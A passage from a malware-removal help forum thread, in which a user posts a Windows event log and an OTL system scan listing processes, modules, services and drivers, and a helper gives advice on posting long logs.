Description = 2:45:47 AM - Error connecting to the internet.  2:45:47 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 6:45:53 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 2:45:52 AM - Error connecting to the internet.  2:45:52 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 7:45:59 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 3:45:59 AM - Error connecting to the internet.  3:45:59 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 7:46:06 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 3:46:04 AM - Error connecting to the internet.  3:46:04 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 8:46:11 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 4:46:11 AM - Error connecting to the internet.  4:46:11 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 8:46:18 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 4:46:16 AM - Error connecting to the internet.  4:46:16 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 5:43:57 PM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 1:43:57 PM - Error connecting to the internet.  1:43:57 PM -     Unable
 to contact server..  
 
Error - 12/22/2010 5:44:13 PM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 1:44:03 PM - Error connecting to the internet.  1:44:03 PM -     Unable
 to contact server..  
 
[ System Events ]
Error - 1/4/2014 2:25:09 AM | Computer Name = Bri | Source = Microsoft-Windows-TaskScheduler | ID = 413
Description = Task Scheduler service failed to load tasks at service startup. Additional
 Data: Error Value: 2147549183.
 
Error - 1/4/2014 2:29:10 AM | Computer Name = Bri | Source = Service Control Manager | ID = 7000
Description = The ReadyComm.DirectRouter service failed to start due to the following
 error:   %%2
 
Error - 1/4/2014 2:57:54 AM | Computer Name = Bri | Source = DCOM | ID = 10010
Description = 
 
Error - 1/4/2014 2:58:02 AM | Computer Name = Bri | Source = HTTP | ID = 15016
Description = 
 
Error - 1/4/2014 2:58:02 AM | Computer Name = Bri | Source = HTTP | ID = 15016
Description = 
 
Error - 1/4/2014 2:58:02 AM | Computer Name = Bri | Source = HTTP | ID = 15016
Description = 
 
Error - 1/4/2014 2:58:02 AM | Computer Name = Bri | Source = HTTP | ID = 15016
Description = 
 
Error - 1/4/2014 4:09:13 PM | Computer Name = Bri | Source = Microsoft-Windows-TaskScheduler | ID = 413
Description = Task Scheduler service failed to load tasks at service startup. Additional
 Data: Error Value: 2147549183.
 
Error - 1/4/2014 4:14:23 PM | Computer Name = Bri | Source = Service Control Manager | ID = 7000
Description = The ReadyComm.DirectRouter service failed to start due to the following
 error:   %%2
 
Error - 1/5/2014 1:39:06 PM | Computer Name = Bri | Source = DCOM | ID = 10010
Description = 
 
 
< End of report >

"Nothing says sausage like sausage!"


#4 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 05 January 2014 - 05:38 PM

Click the More Reply Options button in the bottom right hand corner, paste the log and ensure that the "Enable emoticons?" checkbox is unchecked on the right hand side and then you should be able to post OK.


So long, and thanks for all the fish.

 

 


#5 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 05 January 2014 - 05:42 PM

OTL logfile created on: 1/5/2014 1:30:59 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Bri\Desktop
64bit- Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.80 Gb Total Physical Memory | 0.93 Gb Available Physical Memory | 24.44% Memory free
7.61 Gb Paging File | 3.94 Gb Available in Paging File | 51.85% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 254.14 Gb Total Space | 21.11 Gb Free Space | 8.31% Space Free | Partition Type: NTFS
Drive D: | 29.00 Gb Total Space | 27.38 Gb Free Space | 94.44% Space Free | Partition Type: NTFS
 
Computer Name: BRI | User Name: Bri | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/01/05 13:28:20 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Bri\Desktop\OTL.exe
PRC - [2013/12/17 17:02:36 | 030,714,312 | ---- | M] (Dropbox, Inc.) -- C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2013/12/12 11:56:14 | 003,145,536 | ---- | M] () -- C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
PRC - [2013/11/06 10:42:36 | 000,778,792 | ---- | M] (McAfee, Inc.) -- c:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
PRC - [2013/06/26 18:21:50 | 000,207,528 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
PRC - [2013/06/26 18:21:46 | 000,523,944 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
PRC - [2013/05/09 23:57:22 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/04/21 20:43:52 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
PRC - [2012/12/22 17:23:05 | 000,138,096 | ---- | M] (Facebook Inc.) -- C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe
PRC - [2012/07/12 15:08:52 | 000,075,136 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2012/07/03 08:04:58 | 000,507,312 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
PRC - [2012/02/23 02:40:41 | 002,886,528 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe
PRC - [2010/11/23 07:39:43 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) -- C:\Windows\SysWOW64\nlssrv32.exe
PRC - [2010/08/03 07:48:10 | 003,122,528 | ---- | M] (Lenovo) -- C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
PRC - [2010/06/30 10:23:24 | 000,774,496 | ---- | M] (Digital Delivery Networks, Inc.) -- C:\Program Files (x86)\DDNi\Lenovo Smile Dock\CenterStage.exe
PRC - [2010/06/23 04:39:54 | 000,046,080 | ---- | M] () -- C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
PRC - [2010/03/03 12:16:06 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2010/03/03 12:16:04 | 000,284,696 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2009/12/18 18:52:48 | 000,100,256 | ---- | M] () -- C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
PRC - [2009/12/09 00:48:26 | 002,320,920 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2009/12/09 00:48:24 | 000,268,824 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2013/12/28 23:20:54 | 004,128,768 | ---- | M] () -- c:\ProgramData\WinSpeed\WinSpeed.dll
MOD - [2013/12/17 17:01:12 | 003,558,400 | ---- | M] () -- C:\Users\Bri\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2013/12/12 11:56:14 | 003,145,536 | ---- | M] () -- C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
MOD - [2013/12/03 18:48:04 | 000,399,312 | ---- | M] () -- C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppgooglenaclpluginchrome.dll
MOD - [2013/12/03 18:48:02 | 004,055,504 | ---- | M] () -- C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll
MOD - [2013/12/03 18:47:11 | 000,702,416 | ---- | M] () -- C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\libglesv2.dll
MOD - [2013/12/03 18:47:11 | 000,099,792 | ---- | M] () -- C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\libegl.dll
MOD - [2013/12/03 18:47:08 | 001,619,408 | ---- | M] () -- C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll
MOD - [2013/09/05 00:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013/08/23 11:01:44 | 025,100,288 | ---- | M] () -- C:\Users\Bri\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2013/02/20 20:09:58 | 000,401,408 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml.Linq\c71b89000bd728ffd6ed95eedac84a5b\System.Xml.Linq.ni.dll
MOD - [2013/02/20 20:09:56 | 002,516,992 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Data.Linq\867ac6f4372ad27c9ea26282dab359a6\System.Data.Linq.ni.dll
MOD - [2013/02/20 20:09:16 | 000,082,944 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.AddIn.Contra#\a47e05f3667cb75a5fbf2feda050a757\System.AddIn.Contract.ni.dll
MOD - [2013/02/20 20:07:13 | 002,347,008 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Seri#\428143857fa1c250d50ec55132dd8a2f\System.Runtime.Serialization.ni.dll
MOD - [2013/02/20 20:06:19 | 000,055,296 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\Microsoft.Vsa\0fbe6fb9608ae86afefff724cbb97131\Microsoft.Vsa.ni.dll
MOD - [2013/02/20 20:06:18 | 002,333,696 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\Microsoft.JScript\a010d8661e17d33ce14b71201974c76f\Microsoft.JScript.ni.dll
MOD - [2013/02/20 20:06:15 | 000,452,608 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\dd2d0cf72eac6e5b113a0059aeb3cab5\IAStorUtil.ni.dll
MOD - [2013/02/20 20:06:02 | 002,295,296 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Core\7d3a95d2123d5a7982a451f1319fab8d\System.Core.ni.dll
MOD - [2013/02/20 20:05:56 | 000,634,368 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.AddIn\a29a5c9a523c7596c33bca2fe3360c71\System.AddIn.ni.dll
MOD - [2013/02/20 19:01:57 | 000,368,128 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\0aeaf4f1629dbe8eafc8f47b1795b18a\PresentationFramework.Aero.ni.dll
MOD - [2013/02/20 19:01:14 | 000,771,584 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\01b47a246b4ec7bfec31bf4503aceda1\System.Runtime.Remoting.ni.dll
MOD - [2013/02/20 19:01:11 | 000,628,224 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\2b54822a40e9b08479a79cce0e196af1\System.EnterpriseServices.ni.dll
MOD - [2013/02/20 19:01:09 | 000,627,200 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\00038bb019bb7e4470d3962b58b1926f\System.Transactions.ni.dll
MOD - [2013/02/20 19:01:07 | 006,618,624 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Data\d0dd051976a66e08325379754531421c\System.Data.ni.dll
MOD - [2013/02/20 19:00:46 | 014,325,760 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\36b839247bd1d22a7fd014a74abe9729\PresentationFramework.ni.dll
MOD - [2013/02/20 19:00:10 | 012,433,920 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\05682429807d34d6ff05a77ea153935f\System.Windows.Forms.ni.dll
MOD - [2013/02/20 19:00:01 | 001,592,832 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\e2ee5d77ebe0bd025e7a7a317a43d677\System.Drawing.ni.dll
MOD - [2013/02/20 18:59:56 | 012,218,880 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\549690bfac66934b7c7fd5cf8b120b7c\PresentationCore.ni.dll
MOD - [2013/02/20 18:59:36 | 003,325,952 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\82a4c4666ad83c3a375210247e69646b\WindowsBase.ni.dll
MOD - [2013/02/20 18:59:28 | 005,453,312 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\10aba2c167cc1119b80159fd9ac71ca8\System.Xml.ni.dll
MOD - [2013/02/20 18:59:22 | 000,971,264 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\96a3b737db1e72adaf32d2b350e50c23\System.Configuration.ni.dll
MOD - [2013/02/20 18:59:21 | 007,974,400 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\c54750e64ba10d0fb7b6a636fb3695ca\System.ni.dll
MOD - [2013/02/20 18:59:03 | 011,490,816 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\b0b8554c05f194f546a8ed531320760b\mscorlib.ni.dll
MOD - [2011/11/01 23:26:32 | 000,087,912 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2011/11/01 23:26:12 | 001,242,472 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2011/01/20 09:16:05 | 000,271,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\System.Data.SqlServerCe\3.5.1.0__89845dcd8080cc91\System.Data.SqlServerCe.dll
MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2010/08/03 07:48:10 | 000,492,896 | ---- | M] () -- C:\Program Files (x86)\Lenovo\VeriFace\ChooseLang.dll
MOD - [2009/12/18 18:52:48 | 000,100,256 | ---- | M] () -- C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
MOD - [2009/12/18 18:51:18 | 000,133,024 | ---- | M] () -- C:\Program Files (x86)\Lenovo\Onekey Theater\WindowsApiHookDll32.dll
MOD - [2009/12/18 18:50:38 | 000,161,696 | ---- | M] () -- C:\Program Files (x86)\Lenovo\Onekey Theater\ActiveDetect32.dll
MOD - [2009/06/10 13:23:19 | 000,261,632 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
MOD - [2009/06/10 13:23:17 | 002,933,248 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2013/11/26 22:22:00 | 001,025,232 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe -- (mfecore)
SRV:64bit: - [2013/11/04 16:46:16 | 000,182,752 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:64bit: - [2013/11/04 16:41:02 | 000,219,272 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:64bit: - [2013/09/24 15:07:30 | 000,178,048 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\McAfee\MSC\McAPExe.exe -- (McAPExe)
SRV:64bit: - [2013/08/02 17:52:58 | 000,602,944 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\McAfee\VirusScan\mcods.exe -- (McODS)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (MSK80Service)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McProxy)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (mcpltsvc)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McNaiAnn)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McMPFSvc)
SRV:64bit: - [2013/07/30 10:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (HomeNetSvc)
SRV:64bit: - [2012/08/31 12:20:06 | 000,201,304 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe -- (McAfee SiteAdvisor Service)
SRV:64bit: - [2009/09/22 10:16:32 | 000,579,400 | ---- | M] (Lenovo Group Limited) [On_Demand | Stopped] -- C:\Program Files\Lenovo\ReadyComm\ConnSvc.exe -- (Lenovo ReadyComm ConnSvc)
SRV:64bit: - [2009/08/14 06:22:48 | 000,509,192 | ---- | M] (Lenovo Group Limited) [On_Demand | Stopped] -- C:\Program Files\Lenovo\ReadyComm\AppSvc.exe -- (Lenovo ReadyComm AppSvc)
SRV:64bit: - [2009/07/13 17:41:27 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2009/07/13 17:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\windows\SysNative\rundll32.exe -- (f1f78e38)
SRV - [2013/12/11 17:22:32 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013/11/08 15:13:08 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/10/30 11:25:56 | 000,566,696 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2013/09/05 10:34:30 | 000,171,680 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/07/30 14:29:36 | 000,834,664 | ---- | M] (McAfee, Inc.) [Auto | Stopped] -- C:\Windows\Temp\0090861388898780mcinst.exe -- (0090861388898780mcinstcleanup)
SRV - [2013/06/26 18:21:50 | 000,207,528 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe -- (sftvsa)
SRV - [2013/06/26 18:21:46 | 000,523,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe -- (sftlist)
SRV - [2013/05/09 23:57:22 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012/07/12 15:08:52 | 000,075,136 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2012/02/23 02:40:41 | 002,886,528 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe -- (TeamViewer7)
SRV - [2010/11/23 07:39:43 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) [Auto | Running] -- C:\Windows\SysWOW64\nlssrv32.exe -- (nlsX86cc)
SRV - [2010/10/12 09:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
SRV - [2010/06/25 09:07:20 | 000,117,264 | ---- | M] (CACE Technologies, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WinPcap\rpcapd.exe -- (rpcapd)
SRV - [2010/06/23 04:39:54 | 000,046,080 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe -- (Oasis2Service)
SRV - [2010/04/13 19:11:18 | 000,231,224 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe -- (MOBKbackup)
SRV - [2010/03/18 12:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010/03/03 12:16:06 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard)
SRV - [2010/01/30 00:40:16 | 001,043,584 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)
SRV - [2009/12/09 00:48:26 | 002,320,920 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2009/12/09 00:48:24 | 000,268,824 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2009/07/15 19:12:42 | 000,276,296 | ---- | M] (Lenovo Group Limited) [On_Demand | Stopped] -- C:\Program Files (x86)\Lenovo\ReadyComm\PS_MDP.dll -- (PS_MDP)
SRV - [2009/07/14 06:27:26 | 000,038,152 | ---- | M] (Lenovo Group Limited) [On_Demand | Stopped] -- C:\Program Files (x86)\Lenovo\ReadyComm\common\IGRS.exe -- (IGRS)
SRV - [2009/07/14 06:27:20 | 000,103,688 | ---- | M] (Lenovo Group Limited) [Auto | Stopped] -- C:\Program Files (x86)\Lenovo\ReadyComm\common\router.dll -- (ReadyComm.DirectRouter)
SRV - [2009/06/10 13:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2013/11/26 22:07:22 | 000,096,112 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfencrk.sys -- (mfencrk)
DRV:64bit: - [2013/11/26 22:07:02 | 000,411,944 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfencbdc.sys -- (mfencbdc)
DRV:64bit: - [2013/11/04 16:51:44 | 000,070,112 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:64bit: - [2013/11/04 16:46:34 | 000,343,696 | ---- | M] (McAfee, Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:64bit: - [2013/11/04 16:43:04 | 000,782,360 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:64bit: - [2013/11/04 16:41:22 | 000,519,576 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:64bit: - [2013/11/04 16:40:00 | 000,311,120 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:64bit: - [2013/11/04 16:39:20 | 000,179,792 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:64bit: - [2013/09/23 12:49:22 | 000,197,704 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HipShieldK.sys -- (HipShieldK)
DRV:64bit: - [2013/09/09 10:11:58 | 000,074,560 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\McPvDrv.sys -- (McPvDrv)
DRV:64bit: - [2013/06/26 18:21:50 | 000,023,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Sftvollh.sys -- (Sftvol)
DRV:64bit: - [2013/06/26 18:21:48 | 000,028,840 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\Sftredirlh.sys -- (Sftredir)
DRV:64bit: - [2013/06/26 18:21:46 | 000,273,576 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Sftplaylh.sys -- (Sftplay)
DRV:64bit: - [2013/06/26 18:21:44 | 000,767,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Sftfslh.sys -- (Sftfs)
DRV:64bit: - [2012/12/13 12:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/02/29 22:54:38 | 000,022,896 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/03/10 22:22:41 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/10 22:22:40 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/06/25 09:07:26 | 000,035,344 | ---- | M] (CACE Technologies, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\npf.sys -- (NPF)
DRV:64bit: - [2010/06/23 18:43:58 | 000,167,816 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)
DRV:64bit: - [2010/04/20 09:45:56 | 001,270,896 | ---- | M] (Bison Electronics. Inc. ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BisonC07.sys -- (Cam5607)
DRV:64bit: - [2010/04/13 19:10:24 | 000,066,040 | ---- | M] (Mozy, Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\MOBK.sys -- (MOBKFilter)
DRV:64bit: - [2010/03/30 23:47:08 | 010,322,848 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2010/03/11 19:23:16 | 000,242,720 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2010/03/03 11:51:40 | 000,540,696 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
